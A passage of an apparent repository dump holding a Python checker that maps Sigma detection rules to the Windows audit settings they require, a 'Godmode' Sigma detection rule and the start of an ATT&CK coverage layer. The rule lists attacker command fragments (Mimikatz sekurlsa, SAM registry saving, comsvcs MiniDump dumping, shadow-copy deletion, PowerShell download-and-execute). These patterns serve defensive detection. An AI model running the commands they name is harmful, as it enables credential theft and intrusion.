\"{0CCE9223-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4658, 4690], \"Name\": \"Audit Handle Manipulation\"},\n    \"{0CCE921F-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4660, 4663], \"Name\": \"Audit Kernel Object\"},\n    \"{0CCE9227-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4671, 4691, 4698, 4699, 4700, 4701, 4702, 5148 ,5149, 5888, 5889, 5890], \"Name\": \"Audit Other Object Access Events\"},\n    \"{0CCE921E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4657, 4658, 4660, 4663, 4670, 5039], \"Name\": \"Audit Registry\"},\n    \"{0CCE9245-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4663], \"Name\": \"Audit Removable Storage\"},\n    \"{0CCE9220-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4661], \"Name\": \"Audit SAM\"},\n    \"{0CCE9246-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4818], \"Name\": \"Audit Central Access Policy Staging\"},\n    # Policy Change\n    \"{0CCE922F-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4715, 4719, 4817, 4902, 4906, 4907, 4908, 4912, 4904, 4905], \"Name\": \"Audit Audit Policy Change\"},\n    \"{0CCE9230-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4670, 4706, 4707, 4716, 4713, 4717, 4718, 4739, 4864, 4865, 4866, 4867], \"Name\": \"Audit Authentication Policy Change\"},\n    \"{0CCE9231-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4703, 4704, 4705, 4670, 4911, 4913], \"Name\": \"Audit Authorization Policy Change\"},\n    \"{0CCE9233-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4709, 4710, 4711, 4712, 5040, 5041, 5042, 5043, 5044, 5045, 5046, 5047, 5048, 5440, 5441, 5442, 5443, 5444, 5446, 5448, 5449, 5450, 5456, 5457, 5458, 5459, 5460, 5461, 5462, 5463, 5464, 5465, 5466, 5467, 5468, 5471, 5472, 5473, 5474, 5477], \"Name\": \"Audit Filtering Platform Policy Change\"},\n    \"{0CCE9232-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4956, 4957, 4958], \"Name\": \"Audit 
MPSSVC Rule-Level Policy Change\"},\n    \"{0CCE9234-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4714, 4819, 4826, 4909, 4910, 5063, 5064, 5065, 5066, 5067, 5068, 5069, 5070, 5447, 6144, 6145], \"Name\": \"Audit Other Policy Change Events\"},\n    # Privilege Use\n    \"{0CCE9229-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4673, 4674, 4985], \"Name\": \"Audit Non Sensitive Privilege Use\"},\n    \"{0CCE922A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4985], \"Name\": \"Audit Other Privilege Use Events\"},\n    \"{0CCE9228-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4673, 4674, 4985], \"Name\": \"Audit Sensitive Privilege Use\"},\n    # System\n    \"{0CCE9213-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4960, 4961, 4962, 4963, 4965, 5478, 5479, 5480, 5483, 5484, 5485], \"Name\": \"Audit IPsec Driver\"},\n    \"{0CCE9214-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5024, 5025, 5027, 5028, 5029, 5030, 5032, 5033, 5034, 5035, 5037, 5058, 5059, 6400, 6401, 6402, 6403, 6404, 6405, 6406, 6407, 6408, 6409], \"Name\": \"Audit Other System Events\"},\n    \"{0CCE9210-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4608, 4616, 4621], \"Name\": \"Audit Security State Change\"},\n    \"{0CCE9211-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4610, 4611, 4614, 4622, 4697], \"Name\": \"Audit Security System Extension\"},\n    \"{0CCE9212-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4612, 4615, 4618, 4816, 5038, 5056, 5062, 5057, 5060, 5061, 6281, 6410], \"Name\": \"Audit System Integrity\"}\n}\n\nOTHER_EVENT_ID_MAPPING = {\n    'PowerShell Core': [\n        {'Turn on Module Logging': 'Disabled'},\n        {'Turn on PowerShell Script Block Logging': 'Disabled'},\n        {'Turn on PowerShell Transcription': 'Disabled'}\n        ], \n    'System/Audit Process Creation': [\n        {'Include command line in process creation events': 'Disabled'}\n        ], \n    'Windows Components/Windows PowerShell': [\n        {'Turn on Module 
Logging': 'Disabled'},\n        {'Turn on PowerShell Script Block Logging': 'Disabled'},\n        {'Turn on PowerShell Transcription': 'Disabled'}]\n}\n\nWINDOWS_SYSMON_PROCESS_CREATION_FIELDS = [\"RuleName\", \"UtcTime\", \"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\", \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\", \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"]\n\n# A reduced set of unique fields that are only available in Sysmon/1 - Used for testing\nWINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS = [\"RuleName\", \"UtcTime\", \"ProcessGuid\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\", \"ParentProcessGuid\", \"ParentProcessId\", \"ParentCommandLine\", \"ParentUser\"]\n\nWINDOWS_SECURITY_PROCESS_CREATION_FIELDS = [\"SubjectUserSid\", \"SubjectUserName\", \"SubjectDomainName\", \"SubjectLogonId\", \"NewProcessId\", \"NewProcessName\", \"TokenElevationType\", \"ProcessId\", \"CommandLine\", \"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"ParentProcessName\", \"MandatoryLabel\"]\n\n# A reduced set of unique fields that are only available in Security/4688 - Used for testing\nWINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS = [\"SubjectUserSid\", \"SubjectUserName\", \"SubjectDomainName\", \"SubjectLogonId\", \"NewProcessId\", \"NewProcessName\", \"TokenElevationType\", \"ProcessId\", \"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"ParentProcessName\", \"MandatoryLabel\"]\n\ndef yield_next_rule_file_path(path_to_rules: str) -> str:\n    for root, _, files in os.walk(path_to_rules):\n        for file in files:\n            if 
file.endswith(\".yml\"):\n                yield os.path.join(root, file)\n\ndef get_rule_part(file_path: str, part_name: str):\n    yaml_dicts = get_rule_yaml(file_path)\n    for yaml_part in yaml_dicts:\n        if part_name in yaml_part.keys():\n            return yaml_part[part_name]\n\n    return None\n\ndef get_rule_yaml(file_path: str) -> dict:\n    data = []\n\n    with open(file_path, encoding='utf-8') as f:\n        yaml_parts = yaml.safe_load_all(f)\n        for part in yaml_parts:\n            data.append(part)\n\n    return data\n\ndef extract_events_ids(detection):\n    eids_list = []\n    for key, value in detection.items():\n        if type(value) == dict:\n            for key_, value_ in value.items():\n                if key_ == \"EventID\":\n                    if type(value_) == int:\n                        eids_list.append(value_)\n                    elif type(value_) == list:\n                        for i in value_:\n                            eids_list.append(i)\n        else:\n            pass\n    \n    return eids_list\n    \n\ndef test_invalid_logsource_attributes(path_to_rules):\n    \"\"\"\n        Returns list of rules that leverage unknown logsource\n    \"\"\"\n    faulty_rules = []\n    valid_logsource = [\n        'category',\n        'product',\n        'service',\n        'definition',\n    ]\n\n    for file in yield_next_rule_file_path(path_to_rules):\n        logsource = get_rule_part(file_path=file, part_name=\"logsource\")\n        if not logsource:\n            print(\"Rule {} has no 'logsource'.\".format(file))\n            faulty_rules.append(file)\n            continue\n        valid = True\n        for key in logsource:\n            if key.lower() not in valid_logsource:\n                print(\"Rule {} has a logsource with an invalid field ({})\".format(file, key))\n                valid = False\n            elif not isinstance(logsource[key], str):\n                print(\"Rule {} has a logsource with an invalid 
field type ({})\".format(file, key))\n                valid = False\n        if not valid:\n            faulty_rules.append(file)\n\n    return faulty_rules\n\ndef extract_fields(detection):\n\n    list_of_fields = []\n\n    for key, value in detection.items():\n        if type(value) == list:\n            for element in value:\n                if type(element) == dict:\n                    for key_, value_ in element.items():\n                        field = key_.split(\"|\")[0]\n                        if field not in list_of_fields:\n                            list_of_fields.append(field)\n        if type(value) == dict:\n            for key_, value_ in value.items():\n                field = key_.split(\"|\")[0]\n                if field not in list_of_fields:\n                        list_of_fields.append(field)\n    return list_of_fields\n\ndef get_logsource_dict(path_to_rules, broken_rules):\n    \"\"\"\n        Return a list of dicts of all unique log sources\n    \"\"\"\n    logsource_dict_list_tmp = []\n\n    # Add as many specific service log sources we have defined\n    windows_service_security_dict = defaultdict(list)\n    windows_service_powershell_dict = defaultdict(list)\n    windows_category_process_creation_dict = defaultdict(list)\n    windows_category_ps_module_dict = defaultdict(list)\n    windows_category_ps_script_dict = defaultdict(list)\n\n    for file_ in yield_next_rule_file_path(path_to_rules):\n        if file_ not in broken_rules:\n            logsource = get_rule_part(file_path=file_, part_name=\"logsource\")\n            detection = get_rule_part(file_path=file_, part_name=\"detection\")\n            logsource.pop(\"definition\", None)\n\n            if ((\"product\" in logsource.keys()) and (len(logsource) == 1)):\n                # We skip rules that do not specify exact services for V0.1 // Mainly the generic MIMIKATZ rule\n                continue\n            else:\n                if \"product\" in logsource:\n                 
   # For V0.1 we check for windows logs only\n                    if logsource[\"product\"].lower() == \"windows\":\n\n                        if \"category\" in logsource:\n                            if logsource['category'] == \"process_creation\":\n                                # {\"rule_file_name\" : [fields used]}\n                                fields = extract_fields(detection)\n                                windows_category_process_creation_dict[file_] = fields\n\n                            elif logsource['category'] == \"ps_script\":\n                                fields = extract_fields(detection)\n                                windows_category_ps_script_dict[file_] = fields\n\n                            elif logsource['category'] == \"ps_module\":\n                                # {\"rule_file_name\" : [fields used]}\n                                fields = extract_fields(detection)\n                                windows_category_ps_module_dict[file_] = fields\n                                \n                        elif \"service\" in logsource:\n                            if logsource[\"service\"].lower() == \"security\":\n                                eid_list = extract_events_ids(detection)\n                                windows_service_security_dict[file_] = eid_list\n                                \n\n                            elif logsource[\"service\"].lower() == \"powershell\":\n                                eid_list = extract_events_ids(detection)\n                                windows_service_powershell_dict[file_] = eid_list\n\n    return windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict\n\ndef enrich_logsource_dict(logsource_dict_list):\n    # Placeholder for future enrichment; dict.keys() must be called, a bare .keys is not iterable\n    for logsource in logsource_dict_list:\n        if \"product\" in logsource.keys():\n            if logsource[\"product\"] == \"windows\":\n                if 
\"service\" in logsource.keys():\n                    pass\n                elif \"category\" in logsource.keys():\n                    pass\n\ndef parse_gpresult(gpresult):\n    \"\"\"\n        Parses GPResult command XML output\n    \"\"\"\n    enabled_sec_policies = []\n    enabled_other_logs = defaultdict(list)\n    \n    tree = ET.parse(gpresult)\n    root = tree.getroot()\n    for child in root:\n        if \"ComputerResults\" in child.tag:\n            computerResultsNode = child\n            break\n    extensionDataList = []\n    for i in computerResultsNode:\n        if \"ExtensionData\" in i.tag:\n            extensionDataList.append(i)\n        \n    for i in extensionDataList:\n        ext_type = i[0].attrib[next(iter(i[0].attrib))]\n        if \"AuditSettings\" in ext_type:\n            auditSettings = i[0]\n            for audit in auditSettings:\n                SubcategoryGuid = \"\"\n                SettingValue = \"\"\n                for element in audit:\n                    if \"SubcategoryGuid\" in element.tag:\n                        SubcategoryGuid = element\n                    elif \"SettingValue\" in element.tag:\n                        SettingValue = element\n                # If the audit setting is enabled for \"Success\" or both \"Success and Failure\". 
Then it's okay (for V0.1)\n                if SettingValue.text == \"1\" or SettingValue.text == \"3\":\n                    enabled_sec_policies.append(SubcategoryGuid.text.upper())\n        elif \"Registry\" in ext_type:\n            registrySettings = i[0]\n            for policy in registrySettings:\n                if \"}Policy\" in policy.tag:\n                    policyName = \"\"\n                    policyState = \"\"\n                    policyCategory = \"\"\n                    for element in policy:\n                        if \"Name\" in element.tag:\n                            policyName = element\n                        elif \"State\" in element.tag:\n                            policyState = element\n                        elif \"Category\" in element.tag:\n                            policyCategory = element\n                    # {\"Category\": {\"Name\": \"State\"}}\n                    tmp = {policyName.text : policyState.text}\n                    enabled_other_logs[policyCategory.text].append(tmp)\n    \n    return enabled_sec_policies, enabled_other_logs\n    \n\n\n\nif __name__ == \"__main__\":\n\n    print(f\"\"\"\n       _____ _                                                                                   \n      / ___/(_)___ _____ ___  ____ _                                                             \n      \\__ \\/ / __ `/ __ `__ \\/ __ `/                                                             \n     ___/ / / /_/ / / / / / / /_/ /                                                              \n    /____/_/\\__, /_/ /_/ /_/\\__,_/                           ________              __            \n       / / /____/  ____ __________  __  _______________     / ____/ /_  ___  _____/ /_____  _____\n      / /   / __ \\/ __ `/ ___/ __ \\/ / / / ___/ ___/ _ \\   / /   / __ \\/ _ \\/ ___/ //_/ _ \\/ ___/\n     / /___/ /_/ / /_/ (__  ) /_/ / /_/ / /  / /__/  __/  / /___/ / / /  __/ /__/ ,< /  __/ /    \n    /_____/\\____/\\__, 
/____/\\____/\\__,_/_/   \\___/\\___/   \\____/_/ /_/\\___/\\___/_/|_|\\___/_/     \n                /____/  by Nasreddine Bencherchali (Nextron Systems), v{__version__}             \n    \"\"\")\n    \n    parser = argparse.ArgumentParser(description='SIGMA Logsource Checker')\n    parser.add_argument('-d', help='Path to input directory (SIGMA rules folder; recursive)', metavar='sigma-rules-folder', required=True)\n    parser.add_argument('-gp', help='XML output of the command \"gpresult.exe /x [path]\"', metavar='gpresult')\n    #parser.add_argument('-sysmon', help='Sysmon configuration', metavar='sysmon-config') # TODO: add Sysmon config parser\n    parser.add_argument('-v', help='Get audit and logging details for every rule', action=\"store_true\")\n    #parser.add_argument('-vv', help='Get audit and logging details for every rule', metavar='Very Verbose')\n    args = parser.parse_args()\n\n    if os.path.isdir(args.d):\n        path_to_rules = args.d\n    else:\n        print(\"The path provided isn't a directory: %s\" % args.d)\n        exit(1)\n\n    if args.gp:\n        gpresult = args.gp\n        print(\"Parsing gpresults file (XML) %s ...\\n\" % args.gp)\n        subcategory_id, enabled_other_logs = parse_gpresult(gpresult)\n    else:\n        subcategory_id = []\n        enabled_other_logs = OTHER_EVENT_ID_MAPPING\n\n    print(\"Discovering used log sources ...\\n\")\n    \n    faulty_rules = test_invalid_logsource_attributes(path_to_rules)\n    windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict = get_logsource_dict(path_to_rules, faulty_rules)\n\n    if args.v:\n\n        print(\"Generating detailed logging requirements information for every rule...\\n\")\n        sleep(1)\n\n        if windows_category_process_creation_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: process_creation'...\")\n  
          # We check special fields. If they exist then we suggest the policy to be enabled\n            for filename, fields in windows_category_process_creation_dict.items():\n                special_fields_sysmon = []\n                special_fields_security = []\n                for field in fields:\n                    if field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:\n                        special_fields_sysmon.append(field)\n                    elif field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:\n                        special_fields_security.append(field)\n                \n                if special_fields_sysmon:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-Sysmon EID 1 to be enabled\".format(os.path.basename(filename), special_fields_sysmon))\n                elif special_fields_security:\n                    if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                        print(\"-> Rule '{}' uses fields: {} which Requires Microsoft Windows Security Auditing EID 4688 to be enabled\".format(os.path.basename(filename), special_fields_security))\n                else:\n                    if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                        print(\"-> Rule '{}' uses fields: {} which Requires 'Microsoft Windows Security Auditing EID 4688' or 'Microsoft-Windows-Sysmon EID 1' to be enabled\".format(os.path.basename(filename), fields))\n\n        if windows_category_ps_module_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_module'...\")\n            pwsh5_ps_module_enabled = False\n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] == \"Enabled\":\n                    
pwsh5_ps_module_enabled = True\n\n            for filename, fields in windows_category_ps_module_dict.items():\n                if not pwsh5_ps_module_enabled:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4103 to be enabled\".format(os.path.basename(filename), fields))\n        \n        if windows_category_ps_script_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_script'...\")\n            pwsh5_ps_script_enabled = False\n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] == \"Enabled\":\n                    pwsh5_ps_script_enabled = True\n            for filename, fields in windows_category_ps_script_dict.items():\n                if not pwsh5_ps_script_enabled:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4104 to be enabled\".format(os.path.basename(filename), fields))\n\n        if windows_service_security_dict:\n            print(f\"\\nChecking rules using logsource - 'product: windows / service: security'...\")\n            for filename, eids in windows_service_security_dict.items():\n                specific_eids = set()\n                specific_subcategory = set()\n                for eid in eids:\n                    for key, value in SECURITY_EVENT_ID_MAPPING.items():\n                        if value['EventIDs']:\n                            if ((eid in value['EventIDs']) and (key not in subcategory_id)):\n                                specific_eids.add(eid)\n                                specific_subcategory.add((key, value['Name']))\n                \n                specific_eids = list(specific_eids)\n                specific_subcategory = list(specific_subcategory)\n 
               \n                \n                if len(specific_subcategory) > 1:\n                    print(\"-> Rule '{}' uses EventIDs: {} which Requires:\".format(os.path.basename(filename), specific_eids))\n                    for i in specific_subcategory:\n                        print(\"      - '{}' / {} to be enabled\".format(i[1], i[0]))\n                else:\n                    if len(specific_subcategory) != 0:\n                        print(\"-> Rule '{}' uses EventIDs: {} which Requires: '{}' / {} to be enabled\".format(os.path.basename(filename), specific_eids, specific_subcategory[0][1], specific_subcategory[0][0]))\n\n\n            \n    else:\n\n        print(\"Generating generic logging requirements information for the rule set...\")\n        sleep(1)\n\n        # If no verbose mode was triggered we generate a generic audit policy suggestion for all rules\n        # Process Creation Rules\n        if windows_category_process_creation_dict:\n            enable_sysmon = False\n            enable_4688 = False\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: process_creation'...\")\n            # We check special fields. If they exist then we suggest the policy to be enabled\n            all_process_creation_fields = []\n            for filename, fields in windows_category_process_creation_dict.items():\n                all_process_creation_fields += fields\n            all_process_creation_fields = list(set(all_process_creation_fields))\n            for field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:\n                if field in all_process_creation_fields:\n                    enable_sysmon = True\n                    print(\"-> Rules use Sysmon EID 1 only fields. 
A Sysmon configuration monitoring Process Creation is required\")\n                    break\n            if not enable_sysmon:\n                for field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:\n                    if field in all_process_creation_fields:\n                        if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                            enable_4688 = True\n                            print(\"-> Rules use Microsoft-Windows-Security-Auditing EID 4688 only fields. Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled\")\n                            break\n                        else:\n                            print(\"Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' is already enabled\")\n                            break\n                if not enable_4688:\n                    print(\"-> Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled\")\n\n        if windows_category_ps_module_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_module'...\")\n            \n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] != \"Enabled\":\n                    print(\"-> Rules use Microsoft-Windows-PowerShell EID 4103. 
Audit policy 'Module Logging' must be enabled\")\n                else:\n                    print(\"-> PowerShell 'Module Logging' is Enabled\")\n        \n        if windows_category_ps_script_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_script'...\")\n            \n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] != \"Enabled\":\n                    print(\"-> Rules use Microsoft-Windows-PowerShell EID 4104. Audit policy PowerShell 'Script Block Logging' must be enabled\")\n                else:\n                    print(\"-> PowerShell 'Script Block Logging' is Enabled\")\n        \n        if windows_service_security_dict:\n            print(f\"\\nChecking rules using logsource - 'product: windows / service: security'...\")\n            all_security_eids = []\n            for filename, eids in windows_service_security_dict.items():\n                all_security_eids += eids\n            all_security_eids = list(set(all_security_eids))\n            for eid in all_security_eids:\n                for key, value in SECURITY_EVENT_ID_MAPPING.items():\n                    if value['EventIDs']:\n                        if ((eid in value['EventIDs']) and (key not in subcategory_id)):\n                            print(\"-> Rules use events generated from audit policy sub-category '{}'. The audit policy '{}' must be enabled\".format(key, value['Name']))\n                            subcategory_id.append(key)\n        \n    print(\"\\nFor more information on how to setup logging, you can visit: https://github.com/SigmaHQ/sigma/tree/master/rules-documentation/logsource-guides\") \n"
  },
  {
    "path": "other/godmode_sigma_rule.yml",
    "content": "#    _____        __  __  ___        __      \n#   / ___/__  ___/ / /  |/  /__  ___/ /__    \n#  / (_ / _ \\/ _  / / /|_/ / _ \\/ _  / -_)   \n#  \\___/\\___/\\_,_/ /_/  /_/\\___/\\_,_/\\__/_   \n#    / __(_)__ ___ _  ___ _  / _ \\__ __/ /__ \n#   _\\ \\/ / _ `/  ' \\/ _ `/ / , _/ // / / -_)\n#  /___/_/\\_, /_/_/_/\\_,_/ /_/|_|\\_,_/_/\\__/ \n#        /___/ IDDQD                              \n#\n#  Florian Roth\n#  May 2020\n#  v0.3\n#\n#  A Proof-of-Concept with the most effective search queries\n\ntitle: Godmode Sigma Rule\nid: def6caac-a999-4fc9-8800-cfeff700ba98\ndescription: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?'\nstatus: experimental\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-22\nmodified: 2022-08-04\nlevel: high\naction: global\n---\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Different suspicious or malicious command line parameters\n    selection_plain:\n        CommandLine|contains:\n            - ' -NoP '  # Often used in malicious PowerShell commands\n            - ' -W Hidden '  # Often used in malicious PowerShell commands\n            - ' -decode '  # Used with certutil\n            - ' /decode '  # Used with certutil\n            - ' -e* JAB'  # PowerShell encoded commands\n            - ' -e* SUVYI'  # PowerShell encoded commands\n            - ' -e* SQBFAFgA'  # PowerShell encoded commands\n            - ' -e* aWV4I'  # PowerShell encoded commands\n            - ' -e* IAB'  # PowerShell encoded commands\n            - ' -e* PAA'  # PowerShell encoded commands\n            - ' -e* aQBlAHgA'  # PowerShell encoded commands\n            - 'vssadmin delete shadows'  # Ransomware\n            - 'reg SAVE HKLM\\SAM'  # save registry SAM - syskey extraction\n            - ' -ma '  # ProcDump\n            - 'Microsoft\\Windows\\CurrentVersion\\Run'  # Run key in command line - often in combination with REG 
ADD\n            - '.downloadstring('  # PowerShell download command\n            - '.downloadfile('  # PowerShell download command\n            - ' /ticket:'  # Rubeus\n            - ' sekurlsa'  # Mimikatz\n            - ' p::d '  # Mimikatz\n            - ';iex('  # PowerShell IEX\n            - 'schtasks* /create *AppData'  # Scheduled task creation pointing to AppData\n            - ' comsvcs.dll,MiniDump'  # Process dumping method apart from procdump\n            - ' comsvcs.dll,#24'  # Process dumping method apart from procdump\n            - ' comsvcs.dll MiniDump'  # Process dumping method apart from procdump\n            - ' comsvcs.dll #24'  # Process dumping method apart from procdump\n            - ' comsvcs `#'  # Process dumping method apart from procdump\n            - ' comsvcs #'  # Process dumping method apart from procdump\n            - ' comsvcs MiniDump'  # Process dumping method apart from procdump\n            - '.dmp full'  # Process dumping method apart from procdump\n    selection_parent_child:\n        ParentImage|contains:\n            # Office Dropper Detection\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\OUTLOOK.EXE'\n        Image|contains:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\schtasks.exe'\n            - '*\\scrcons.exe'\n            - '\\regsvr32.exe'\n            - '\\hh.exe'\n            - '\\wmic.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\forfiles.exe'\n            - '\\AppData\\'\n    selection_webshells:\n        Image|contains:\n            - '\\apache*'\n            - '\\tomcat*'\n            - '\\w3wp.exe'\n            - '\\php-cgi.exe'\n            - '\\nginx.exe'\n            - '\\httpd.exe'\n        CommandLine|contains:\n         
   - 'whoami'\n            - 'net user '\n            - 'ping -n '\n            - 'systeminfo'\n            - '&cd&echo'\n            - 'cd /d '  # https://www.computerhope.com/cdhlp.htm\n    # Running whoami as LOCAL_SYSTEM (usually after privilege escalation)\n    selection_whoami:\n        Image|contains: '\\whoami.exe'\n        User|contains: \n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: 1 of them\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection_file_creation:\n        EventID: 11\n        TargetFilename|contains:\n            - '.dmp'  # dump process memory\n            - 'Desktop\\how'  # Ransomware\n            - 'Desktop\\decrypt'  # Ransomware\n    selection_registry_modifications:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains:\n            - 'UserInitMprLogonScript'  # persistence\n            - '\\CurrentVersion\\Image File Execution Options\\'  # persistence\n    selection_registry_run:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Run\\'  # persistence\n            - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'   # persistence\n        Details|contains:\n            - 'AppData'\n            - '\\Users\\Public\\'\n            - '\\Temp\\'\n            - 'powershell'\n            - 'wscript'\n            - 'cscript'\n    condition: 1 of them\n---\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Malicious service installs\n    selection:\n        EventID: 7045\n        ServiceName|contains:\n            - 'WCESERVICE'\n            - 'WCE SERVICE'\n            - 'winexesvc'\n            - 'DumpSvc'\n            - 'pwdump'\n            - 'gsecdump'\n            - 'cachedump'\n    condition:\n        1 of them"
  },
  {
    "path": "other/sigma_attack_nav_coverage.json",
    "content": "{\n  \"name\": \"Sigma Analytics Coverage\",\n  \"versions\": {\n    \"attack\": \"18.1\",\n    \"navigator\": \"4.8.1\",\n    \"layer\": \"4.4\"\n  },\n  \"domain\": \"enterprise-attack\",\n  \"description\": \"Sigma coverage heatmap generated by Sigma CLI with score function count\",\n  \"gradient\": {\n    \"colors\": [\n      \"#66b1ffff\",\n      \"#ff66f4ff\"\n    ],\n    \"minValue\": 0,\n    \"maxValue\": 20\n  },\n  \"techniques\": [\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"persistence\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"initial-access\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114.003\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": 
